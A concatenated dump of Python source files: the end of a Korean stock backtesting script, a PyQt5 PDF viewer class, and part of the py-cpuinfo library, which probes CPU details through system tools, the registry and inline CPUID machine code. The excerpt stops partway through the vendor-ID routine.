plt.plot(df_tsg.index, df_tsg['sgm_cumsum'], label='sgm_cumsum')
plt.xticks([])
plt.legend(loc='best')
plt.grid()
plt.subplot(gs[1])
plt.plot(df_bct.index, df_bct['hold_count'], color='g', label='hold_count')
plt.xticks(list(df_tsg.index[::12]), rotation=45)
plt.legend(loc='best')
plt.tight_layout()
plt.show()
if __name__ == "__main__":
start = datetime.datetime.now()
con = sqlite3.connect(DB_TICK)
df = pd.read_sql("SELECT name FROM sqlite_master WHERE TYPE = 'table'", con)
df1 = pd.read_sql('SELECT * FROM codename', con).set_index('index')
df2 = pd.read_sql('SELECT * FROM moneytop', con).set_index('index')
con.close()
table_list = list(df['name'].values)
table_list.remove('moneytop')
table_list.remove('codename')
if 'dist' in table_list:
table_list.remove('dist')
if 'dist_chk' in table_list:
table_list.remove('dist_chk')
if 'sqlite_sequence' in table_list:
table_list.remove('sqlite_sequence')
if 'temp' in table_list:
table_list.remove('temp')
last = len(table_list)
if len(table_list) > 0:
gap_ch = 5.0
avg_time = 300
gap_sm = 50
ch_low = 90
dm_low = 30000
per_low = 5
per_high = 25
sell_ratio = 0.5
num = [gap_ch, avg_time, gap_sm, ch_low, dm_low, per_low, per_high, sell_ratio]
q = Queue()
w = Process(target=Total, args=(q, last, num, df1))
w.start()
procs = []
workcount = int(last / MULTI_COUNT) + 1
for j in range(0, last, workcount):
code_list = table_list[j:j + workcount]
p = Process(target=BackTesterVj, args=(q, code_list, num, df2))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
end = datetime.datetime.now()
print(f" 백테스팅 소요시간 {end - start}")
|
pdf_viewer.py
|
import sys
from PyQt5 import QtWidgets
from multiprocessing import Process
from .window import Window
class PDFViewer:
"""
Viewer to show a PDF File
"""
def __init__(self, pdf, size):
"""
Initializes a pdf viewer for a certain pdf
:param pdf: pdf to be shown
"""
self._pdf = pdf
self._size = size
self._process = None
def open_pdf(self):
"""opens a window wiht the pdf in the background"""
self._process = Process(target=self._show_pdf, args=[self._pdf], name='ControlBlockDiagram')
self._process.start()
def close_pdf(self):
"""closes the window"""
self._process.kill()
def show_pdf(self):
"""opens a window with the pdf file"""
app = QtWidgets.QApplication(sys.argv)
window = Window(self._pdf, self._size)
window.show()
app.exec_()
@staticmethod
def _show_pdf(pdf, size=(800, 600)):
"""opens a window for a given pdf file"""
app = QtWidgets.QApplication(sys.argv)
window = Window(pdf, size)
window.show()
app.exec_()
|
cpuinfo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2014-2020 Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (7, 0, 0)
CPUINFO_VERSION_STRING = '.'.join([str(n) for n in CPUINFO_VERSION])
import os, sys
import platform
import multiprocessing
import ctypes
IS_PY2 = sys.version_info[0] == 2
CAN_CALL_CPUID_IN_SUBPROCESS = True
g_trace = None
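# Optional debug tracer: records the progress of each probe either to an
# in-memory StringIO or to a cpuinfo_trace_<timestamp>.trace file on disk.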
class Trace(object):
def __init__(self, is_active, is_stored_in_string):
self._is_active = is_active
if not self._is_active:
return
from datetime import datetime
if IS_PY2:
from cStringIO import StringIO
else:
from io import StringIO
if is_stored_in_string:
self._output = StringIO()
else:
date = datetime.now().strftime("%Y-%m-%d_%H-%M-%S-%f")
self._output = open('cpuinfo_trace_{0}.trace'.format(date), 'w')
self._stdout = StringIO()
self._stderr = StringIO()
self._err = None
def header(self, msg):
if not self._is_active: return
from inspect import stack
frame = stack()[1]
file = frame[1]
line = frame[2]
self._output.write("{0} ({1} {2})\n".format(msg, file, line))
self._output.flush()
def success(self):
if not self._is_active: return
from inspect import stack
frame = stack()[1]
file = frame[1]
line = frame[2]
self._output.write("Success ... ({0} {1})\n\n".format(file, line))
self._output.flush()
def fail(self, msg):
if not self._is_active: return
from inspect import stack
frame = stack()[1]
file = frame[1]
line = frame[2]
if isinstance(msg, str):
msg = ''.join(['\t' + line for line in msg.split('\n')]) + '\n'
self._output.write(msg)
self._output.write("Failed ... ({0} {1})\n\n".format(file, line))
self._output.flush()
elif isinstance(msg, Exception):
from traceback import format_exc
err_string = format_exc()
self._output.write("\tFailed ... ({0} {1})\n".format(file, line))
self._output.write(''.join(['\t\t{0}\n'.format(n) for n in err_string.split('\n')]) + '\n')
self._output.flush()
def command_header(self, msg):
if not self._is_active: return
from inspect import stack
frame = stack()[3]
file = frame[1]
line = frame[2]
self._output.write("\t{0} ({1} {2})\n".format(msg, file, line))
self._output.flush()
def command_output(self, msg, output):
if not self._is_active: return
self._output.write("\t\t{0}\n".format(msg))
self._output.write(''.join(['\t\t\t{0}\n'.format(n) for n in output.split('\n')]) + '\n')
self._output.flush()
def keys(self, keys, info, new_info):
if not self._is_active: return
from inspect import stack
frame = stack()[2]
file = frame[1]
line = frame[2]
# List updated keys
self._output.write("\tChanged keys ({0} {1})\n".format(file, line))
changed_keys = [key for key in keys if key in info and key in new_info and info[key] != new_info[key]]
if changed_keys:
for key in changed_keys:
self._output.write('\t\t{0}: {1} to {2}\n'.format(key, info[key], new_info[key]))
else:
self._output.write('\t\tNone\n')
# List new keys
self._output.write("\tNew keys ({0} {1})\n".format(file, line))
new_keys = [key for key in keys if key in new_info and key not in info]
if new_keys:
for key in new_keys:
self._output.write('\t\t{0}: {1}\n'.format(key, new_info[key]))
else:
self._output.write('\t\tNone\n')
self._output.write('\n')
self._output.flush()
def write(self, msg):
if not self._is_active: return
self._output.write(msg + '\n')
self._output.flush()
def to_dict(self, info, is_fail):
return {
'output' : self._output.getvalue(),
'stdout' : self._stdout.getvalue(),
'stderr' : self._stderr.getvalue(),
'info' : info,
'err' : self._err,
'is_fail' : is_fail
}
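# DataSource funnels every external probe (files, registry keys, command-line
# tools) through static methods, so most of the parsing code below does not have
# to query the operating system directly.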
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
arch_string_raw = platform.machine()
uname_string_raw = platform.uname()[5]
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(_program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(_program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(_program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(_program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(_program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(_program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
is_beos = 'beos' in uname or 'haiku' in uname
return is_beos and len(_program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(_program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(_program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = _run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return _run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return _run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_b():
return _run_and_get_stdout(['sestatus', '-b'])
@staticmethod
def dmesg_a():
return _run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return _run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return _run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return _run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return _run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
return _run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return _run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
import glob
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return _run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return _run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
processor_brand = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "ProcessorNameString")
return processor_brand.strip()
@staticmethod
def winreg_vendor_id_raw():
vendor_id_raw = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "VendorIdentifier")
return vendor_id_raw
@staticmethod
def winreg_arch_string_raw():
arch_string_raw = _read_windows_registry_key(r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "PROCESSOR_ARCHITECTURE")
return arch_string_raw
@staticmethod
def winreg_hz_actual():
hz_actual = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "~Mhz")
hz_actual = _to_decimal_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
feature_bits = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "FeatureSet")
return feature_bits
def _program_paths(program_name):
	paths = []
	# Materialize PATHEXT into a list so it can be re-checked for every PATH entry
	# (a filter() object would be exhausted after the first directory on Python 3).
	exts = [e for e in os.environ.get('PATHEXT', '').split(os.pathsep) if e]
	for p in os.environ.get('PATH', '').split(os.pathsep):
		p = os.path.join(p, program_name)
		if os.access(p, os.X_OK):
			paths.append(p)
		for e in exts:
			pext = p + e
			if os.access(pext, os.X_OK):
				paths.append(pext)
	return paths
def _run_and_get_stdout(command, pipe_command=None):
from subprocess import Popen, PIPE
p1, p2, stdout_output, stderr_output = None, None, None, None
g_trace.command_header('Running command "' + ' '.join(command) + '" ...')
# Run the command normally
if not pipe_command:
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
# Run the command and pipe it into another command
else:
p2 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
p1 = Popen(pipe_command, stdin=p2.stdout, stdout=PIPE, stderr=PIPE)
p2.stdout.close()
# Get the stdout and stderr
stdout_output, stderr_output = p1.communicate()
if not IS_PY2:
stdout_output = stdout_output.decode(encoding='UTF-8')
stderr_output = stderr_output.decode(encoding='UTF-8')
# Send the result to the logger
g_trace.command_output('return code:', str(p1.returncode))
g_trace.command_output('stdout:', stdout_output)
# Return the return code and stdout
return p1.returncode, stdout_output
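# Illustrative use (hypothetical output):
#   _run_and_get_stdout(['cat', '/proc/cpuinfo']) -> (0, 'processor\t: 0\n...')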
def _read_windows_registry_key(key_name, field_name):
g_trace.command_header('Reading Registry key "{0}" field "{1}" ...'.format(key_name, field_name))
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_name)
value = winreg.QueryValueEx(key, field_name)[0]
winreg.CloseKey(key)
g_trace.command_output('value:', str(value))
return value
# Make sure we are running on a supported system
def _check_arch():
arch, bits = _parse_arch(DataSource.arch_string_raw)
if not arch in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8', 'PPC_64', 'S390X']:
raise Exception("py-cpuinfo currently only works on X86 and some ARM/PPC/S390X CPUs.")
def _obj_to_b64(thing):
import pickle
import base64
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def _b64_to_obj(thing):
import pickle
import base64
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
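# These two helpers round-trip any picklable object through base64 text, e.g.
# _b64_to_obj(_obj_to_b64({'a': 1})) == {'a': 1}. They are used to send the
# CPUID results back from the worker process through a Queue as a plain string.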
def _utf_to_str(input):
if IS_PY2 and isinstance(input, unicode):
return input.encode('utf-8')
elif isinstance(input, list):
return [_utf_to_str(element) for element in input]
elif isinstance(input, dict):
return {_utf_to_str(key): _utf_to_str(value)
for key, value in input.items()}
else:
return input
def _copy_new_fields(info, new_info):
keys = [
'vendor_id_raw', 'hardware_raw', 'brand_raw', 'hz_advertised_friendly', 'hz_actual_friendly',
'hz_advertised', 'hz_actual', 'arch', 'bits', 'count',
'arch_string_raw', 'uname_string_raw',
'l2_cache_size', 'l2_cache_line_size', 'l2_cache_associativity',
'stepping', 'model', 'family',
'processor_type', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
g_trace.keys(keys, info, new_info)
# Update the keys with new values
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
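# Illustrative use: for a raw_string containing the line "cpu MHz : 1600.00",
# _get_field(False, raw_string, float, 0.0, 'cpu MHz') returns 1600.0.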
def _to_decimal_string(ticks):
try:
# Convert to string
ticks = '{0}'.format(ticks)
# Strip off non numbers and decimal places
ticks = "".join(n for n in ticks if n.isdigit() or n=='.').strip()
if ticks == '':
ticks = '0'
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
# Make sure the number can be converted to a float
ticks = float(ticks)
ticks = '{0}'.format(ticks)
return ticks
except:
return '0.0'
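# Illustrative values: _to_decimal_string('2400 MHz') -> '2400.0' and
# _to_decimal_string('2.20') -> '2.2' (non-numeric characters are dropped first).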
def _hz_short_to_full(ticks, scale):
try:
# Make sure the number can be converted to a float
ticks = float(ticks)
ticks = '{0}'.format(ticks)
# Scale the numbers
hz = ticks.lstrip('0')
old_index = hz.index('.')
hz = hz.replace('.', '')
hz = hz.ljust(scale + old_index+1, '0')
new_index = old_index + scale
hz = '{0}.{1}'.format(hz[:new_index], hz[new_index:])
left, right = hz.split('.')
left, right = int(left), int(right)
return (left, right)
except:
return (0, 0)
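# Illustrative value: _hz_short_to_full('2.8', 9) -> (2800000000, 0), i.e. the
# whole and fractional Hz for a 2.8 GHz figure.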
def _hz_friendly_to_full(hz_string):
try:
hz_string = hz_string.strip().lower()
hz, scale = (None, None)
if hz_string.endswith('ghz'):
scale = 9
elif hz_string.endswith('mhz'):
scale = 6
elif hz_string.endswith('hz'):
scale = 0
hz = "".join(n for n in hz_string if n.isdigit() or n=='.').strip()
if not '.' in hz:
hz += '.0'
hz, scale = _hz_short_to_full(hz, scale)
return (hz, scale)
except:
return (0, 0)
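# Illustrative value: _hz_friendly_to_full('2.80GHz') -> (2800000000, 0).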
def _hz_short_to_friendly(ticks, scale):
try:
# Get the raw Hz as a string
left, right = _hz_short_to_full(ticks, scale)
result = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = result.index('.')
result = result.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
result = '{0}.{1}'.format(result[:-scale-1], result[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
result = '{0:.4f} {1}'.format(float(result), symbol)
result = result.rstrip('0')
return result
except:
return '0.0000 Hz'
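# Illustrative value: _hz_short_to_friendly('2.8', 9) -> '2.8000 GHz'.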
def _to_friendly_bytes(input):
import re
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
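# Illustrative value: _to_friendly_bytes('1024K') -> '1024 KB'; strings that do
# not match the expected pattern are returned unchanged.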
def _friendly_bytes_to_int(friendly_bytes):
input = friendly_bytes.lower()
formats = {
'gb' : 1024 * 1024 * 1024,
'mb' : 1024 * 1024,
'kb' : 1024,
'g' : 1024 * 1024 * 1024,
'm' : 1024 * 1024,
'k' : 1024,
'b' : 1,
}
try:
for pattern, multiplier in formats.items():
if input.endswith(pattern):
return int(input.split(pattern)[0].strip()) * multiplier
except Exception as err:
pass
return friendly_bytes
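# Illustrative value: _friendly_bytes_to_int('8192 KB') -> 8388608; strings that
# cannot be parsed are returned unchanged.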
def _parse_cpu_brand_string(cpu_string):
	# Just return ('0.0', 0) if the processor brand does not contain an Hz value
if not 'hz' in cpu_string.lower():
return ('0.0', 0)
hz = cpu_string.lower()
scale = 0
if hz.endswith('mhz'):
scale = 6
elif hz.endswith('ghz'):
scale = 9
if '@' in hz:
hz = hz.split('@')[1]
else:
hz = hz.rsplit(None, 1)[1]
hz = hz.rstrip('mhz').rstrip('ghz').strip()
hz = _to_decimal_string(hz)
return (hz, scale)
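# Illustrative value (hypothetical brand string):
#   _parse_cpu_brand_string('Intel(R) Core(TM) i7 CPU @ 2.20GHz') -> ('2.2', 9)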
def _parse_cpu_brand_string_dx(cpu_string):
import re
# Find all the strings inside brackets ()
starts = [m.start() for m in re.finditer(r"\(", cpu_string)]
ends = [m.start() for m in re.finditer(r"\)", cpu_string)]
insides = {k: v for k, v in zip(starts, ends)}
insides = [cpu_string[start+1 : end] for start, end in insides.items()]
# Find all the fields
vendor_id, stepping, model, family = (None, None, None, None)
for inside in insides:
for pair in inside.split(','):
pair = [n.strip() for n in pair.split(':')]
if len(pair) > 1:
name, value = pair[0], pair[1]
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
# Find the Processor Brand
# Strip off extra strings in brackets at end
brand = cpu_string.strip()
is_working = True
while is_working:
is_working = False
for inside in insides:
full = "({0})".format(inside)
if brand.endswith(full):
brand = brand[ :-len(full)].strip()
is_working = True
# Find the Hz in the brand string
hz_brand, scale = _parse_cpu_brand_string(brand)
# Find Hz inside brackets () after the brand string
if hz_brand == '0.0':
for inside in insides:
hz = inside
for entry in ['GHz', 'MHz', 'Hz']:
if entry in hz:
hz = "CPU @ " + hz[ : hz.find(entry) + len(entry)]
hz_brand, scale = _parse_cpu_brand_string(hz)
break
return (hz_brand, scale, brand, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_brand_string_dx(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
hz_actual, scale, processor_brand, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
# If advertised hz not found, use the actual hz
if hz_advertised == '0.0':
scale = 6
hz_advertised = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised_friendly'] = _hz_short_to_friendly(hz_advertised, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = _hz_short_to_full(hz_advertised, scale)
info['hz_actual'] = _hz_short_to_full(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except Exception as err:
g_trace.fail(err)
#raise
pass
return {}
def _parse_arch(arch_string_raw):
import re
arch, bits = None, None
arch_string_raw = arch_string_raw.lower()
# X86
if re.match(r'^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', arch_string_raw):
arch = 'X86_32'
bits = 32
elif re.match(r'^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', arch_string_raw):
arch = 'X86_64'
bits = 64
# ARM
elif re.match(r'^armv8-a|aarch64$', arch_string_raw):
arch = 'ARM_8'
bits = 64
elif re.match(r'^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', arch_string_raw):
arch = 'ARM_7'
bits = 32
elif re.match(r'^armv8$|^armv8[a-z]$|^armv8-[a-z]$', arch_string_raw):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match(r'^ppc32$|^prep$|^pmac$|^powermac$', arch_string_raw):
arch = 'PPC_32'
bits = 32
elif re.match(r'^powerpc$|^ppc64$|^ppc64le$', arch_string_raw):
arch = 'PPC_64'
bits = 64
# SPARC
elif re.match(r'^sparc32$|^sparc$', arch_string_raw):
arch = 'SPARC_32'
bits = 32
elif re.match(r'^sparc64$|^sun4u$|^sun4v$', arch_string_raw):
arch = 'SPARC_64'
bits = 64
# S390X
elif re.match(r'^s390x$', arch_string_raw):
arch = 'S390X'
bits = 64
return (arch, bits)
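# Illustrative values: _parse_arch('x86_64') -> ('X86_64', 64),
# _parse_arch('armv7l') -> ('ARM_7', 32); unrecognized strings give (None, None).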
def _is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
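# Illustrative values: _is_bit_set(0b1010, 1) -> True, _is_bit_set(0b1010, 2) -> False.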
def _is_selinux_enforcing(trace):
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
trace.fail('Failed to find sestatus.')
return False
# Run the sestatus, and just return if it failed to run
returncode, output = DataSource.sestatus_b()
if returncode != 0:
trace.fail('Failed to run sestatus. Skipping ...')
return False
# Figure out if explicitly in enforcing mode
for line in output.splitlines():
line = line.strip().lower()
if line.startswith("current mode:"):
if line.endswith("enforcing"):
return True
else:
return False
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = False
can_selinux_exec_memory = False
for line in output.splitlines():
line = line.strip().lower()
if line.startswith("allow_execheap") and line.endswith("on"):
can_selinux_exec_heap = True
elif line.startswith("allow_execmem") and line.endswith("on"):
can_selinux_exec_memory = True
trace.command_output('can_selinux_exec_heap:', can_selinux_exec_heap)
trace.command_output('can_selinux_exec_memory:', can_selinux_exec_memory)
return (not can_selinux_exec_heap or not can_selinux_exec_memory)
def _filter_dict_keys_with_empty_values(info):
# Filter out None, 0, "", (), {}, []
info = {k: v for k, v in info.items() if v}
# Filter out (0, 0)
info = {k: v for k, v in info.items() if v != (0, 0)}
# Filter out strings that start with "0.0"
info = {k: v for k, v in info.items() if not (type(v) == str and v.startswith('0.0'))}
return info
class ASM(object):
def __init__(self, restype=None, argtypes=(), machine_code=[]):
self.restype = restype
self.argtypes = argtypes
self.machine_code = machine_code
self.prochandle = None
self.mm = None
self.func = None
self.address = None
self.size = 0
def compile(self):
machine_code = bytes.join(b'', self.machine_code)
self.size = ctypes.c_size_t(len(machine_code))
if DataSource.is_windows:
# Allocate a memory segment the size of the machine code, and make it executable
size = len(machine_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
self.address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not self.address:
raise Exception("Failed to VirtualAlloc")
# Copy the machine code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(self.address, machine_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(self.address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(self.address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
from mmap import mmap, MAP_PRIVATE, MAP_ANONYMOUS, PROT_WRITE, PROT_READ, PROT_EXEC
# Allocate a private and executable memory segment the size of the machine code
machine_code = bytes.join(b'', self.machine_code)
self.size = len(machine_code)
self.mm = mmap(-1, self.size, flags=MAP_PRIVATE | MAP_ANONYMOUS, prot=PROT_WRITE | PROT_READ | PROT_EXEC)
# Copy the machine code into the memory segment
self.mm.write(machine_code)
self.address = ctypes.addressof(ctypes.c_int.from_buffer(self.mm))
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(self.restype, *self.argtypes)
self.func = functype(self.address)
def run(self):
# Call the machine code like a function
retval = self.func()
return retval
def free(self):
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(self.address), ctypes.c_size_t(0), MEM_RELEASE)
else:
self.mm.close()
self.prochandle = None
self.mm = None
self.func = None
self.address = None
self.size = 0
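# CPUID executes the CPUID/RDTSC instructions directly via the ASM helper above
# rather than shelling out, which is why _get_cpu_info_from_cpuid runs it in a
# separate process that can crash without taking down the interpreter.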
class CPUID(object):
def __init__(self, trace=None):
if trace == None:
trace = Trace(False, False)
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = _is_selinux_enforcing(trace)
def _asm_func(self, restype=None, argtypes=(), machine_code=[]):
asm = ASM(restype, argtypes, machine_code)
asm.compile()
return asm
def _run_asm(self, *machine_code):
asm = ASM(ctypes.c_uint32, (), machine_code)
asm.compile()
retval = asm.run()
asm.free()
return retval
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
b"\x31\xC0", # xor eax,eax
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
		# Each byte of EBX, EDX, and ECX (in that order) is an ASCII letter of the vendor ID string
vendor_id = []
